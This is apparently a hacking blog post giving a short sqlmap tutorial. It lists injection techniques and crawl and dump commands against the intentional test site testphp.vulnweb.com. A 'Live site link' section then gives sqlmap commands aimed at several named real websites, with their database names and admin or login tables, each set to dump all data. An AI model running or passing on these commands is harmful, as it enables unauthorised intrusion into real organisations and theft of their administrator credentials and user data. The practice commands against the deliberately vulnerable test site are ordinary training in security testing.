⚠️ডিজিটাল নিরাপত্তা আইন, ২০১৮ রহিতক্রমে সাইবার নিরাপত্তা নিশ্চিতকরণ এবং ডিজিটাল বা ইলেকট্রনিক মাধ্যমে সংঘটিত অপরাধ শনাক্তকরণ, প্রতিরোধ, দমন ও উক্ত অপরাধের বিচার এবং আনুষঙ্গিক বিষয়ে নুতনভাবে বিধান প্রণয়নকল্পে প্রণীত আইন⚠️

Header Ads Widget

Responsive Advertisement

SQL MAP use

Cyber Insect June 06, 2025

 







      ___

       __H__

 ___ ___[.]_____ ___ ___  {1.6.4#stable}

|_ -| . [']     | .'| . |

|___|_  [)]_|_|_|__,|  _|

      |_|V...       |_|   https://sqlmap.org


Usage: python3 sqlmap [options]


sqlmap: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wizard, --shell, --update, --purge, --list-tampers or --dependencies). Use -h for basic and -hh for advanced help



sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.


More : link



Techniques:- 

1.B -> boolean - based injection 

2.E -> error - based 

3.T -> time - based 

4.U -> union based


risk -> degree of harmful playload // some time change hash value crawl :- 

depth 1 : http://abc.com/data 

depth 2 : http://abc.com/data/news 

depth 3 : http://abc.com/data/news/hack




Find vulnerable parameter 

sqlmap -u http://testphp.vulnweb.com/ --crawl2 

sqlmap -u http://testphp.vulnweb.com/ --crawl 2 --technique="U" --batch 

sqlmap -u http://testphp.vulnweb.com/ --crawl 2 --batch --threads 5 

sqlmap -u http://testphp.vulnweb.com/ --crawl 2 --batch --risk 1

After getting parameter 

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs 

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D database --tables 

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D database -T table--columns 

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --dump all 

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --dump all






Live site link



 sqlmap -u http://www.proficientindustries.in/view-single-news.php?id=1 -D nsp_proficientin -T admin_login --dump all

  sqlmap -u http://www.aitindia.in/aitnew/e_course_detail.php?id=1 -D u670106978_aitindia -T admin --dump all



   sqlmap -u http://bdgroup.com.bd/awards.php?id=7 -D bdgroup_bdg --dump all

    sqlmap -u https://www.csi-india.org/news/index.php?id=18 -D  information_schema --dump all



Final result
Tags:

Post a Comment

0 Comments